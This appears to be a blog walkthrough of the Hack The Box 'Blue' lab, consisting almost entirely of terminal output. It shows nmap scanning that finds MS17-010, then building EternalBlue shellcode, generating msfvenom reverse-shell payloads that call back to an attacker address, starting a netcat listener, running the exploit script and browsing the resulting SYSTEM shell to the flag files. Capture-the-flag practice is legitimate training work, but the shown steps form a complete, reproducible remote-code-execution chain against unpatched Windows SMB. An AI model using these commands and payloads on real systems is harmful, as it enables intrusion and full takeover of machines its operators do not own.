Cracking The Blue Box, EternalBlue

┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ nmap -sC -sV -p0-1000 10.10.10.40 > results.txt &
[1] 1377
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ 1 ⚙
[1] + done nmap -sC -sV -p0-1000 10.10.10.40 > results.txt
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ cat results.txt 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:07 EST
Nmap scan report for 10.10.10.40
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 40s, deviation: 1s, median: 39s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-01-12T13:08:13+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-12T13:08:12
|_ start_date: 2021-01-12T13:03:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.29 seconds
──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ nmap -p 445 --script vuln 10.10.10.40 > smbvulnerability.txt &
[1] 1575

┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ 1 ⚙
[1] + done nmap -p 445 --script vuln 10.10.10.40 > smbvulnerability.txt
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ cat smbvulnerability.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:25 EST
Nmap scan report for 10.10.10.40
Host is up (0.20s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 27.82 seconds
┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$ nasm -f bin eternalblue_kshellcode_x64.asm -o myexploit.bin;nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$ msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.7 LPORT=54;msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=10.10.14.7 LPORT=53 -f raw -o sc_x64_msf.bin;cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin;cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin;python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53 1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
┌──(kali㉿kali)-[~/HackTheBox/Blue/exploits/AutoBlue-MS17-010]
└─$ python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53 1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 15,890,034,688 bytes free
C:\Users>
C:\Users>cd haris
cd haris
C:\Users\haris>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris14/07/2017 13:45 <DIR> .
14/07/2017 13:45 <DIR> ..
15/07/2017 07:58 <DIR> Contacts
24/12/2017 02:23 <DIR> Desktop
15/07/2017 07:58 <DIR> Documents
15/07/2017 07:58 <DIR> Downloads
15/07/2017 07:58 <DIR> Favorites
15/07/2017 07:58 <DIR> Links
15/07/2017 07:58 <DIR> Music
15/07/2017 07:58 <DIR> Pictures
15/07/2017 07:58 <DIR> Saved Games
15/07/2017 07:58 <DIR> Searches
15/07/2017 07:58 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,890,034,688 bytes free
C:\Users\haris>cd Desktop
cd Desktop
C:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris\Desktop24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
21/07/2017 06:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 15,890,034,688 bytes free
C:\Users\haris\Desktop>
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Contacts
24/12/2017 02:22 <DIR> Desktop
21/07/2017 06:56 <DIR> Documents
21/07/2017 06:56 <DIR> Downloads
21/07/2017 06:56 <DIR> Favorites
21/07/2017 06:56 <DIR> Links
21/07/2017 06:56 <DIR> Music
21/07/2017 06:56 <DIR> Pictures
21/07/2017 06:56 <DIR> Saved Games
21/07/2017 06:56 <DIR> Searches
21/07/2017 06:56 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,890,034,688 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
21/07/2017 06:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,890,034,688 bytes free
C:\Users\Administrator\Desktop>

--

--

--

Grad Student. Member Bi0s.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Don’t forget to join us every Wednesday at 8:30 PM (GMT+08 SGT) for Episode 3 of our @PrivacySwap…

{UPDATE} Sudoku - Unblock Puzzles Game Hack Free Resources Generator

Scraping data from LinkedIn and an oil company’s breach

ROBOMARS: ILO WHITELIST IMPORTANT UPDATE

iBG Finance

{UPDATE} 5 Nights at Pizzeria Dead City 3D Hack Free Resources Generator

An Elephant in Ballet Slippers? Bringing Agility To Cyber Security

Minifying XSS

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Varun

Varun

Grad Student. Member Bi0s.

More from Medium

How DNS resolves the ip?

Local cache -> DNS resolver(ISP) -> Root server -> TLD server -> Authoritative server -> host.

Hackthebox — Meta Walkthrough

Tracking: How To Git the Most Out of Your Version Control System

OWASP Top 10 — TryHackMe | Injections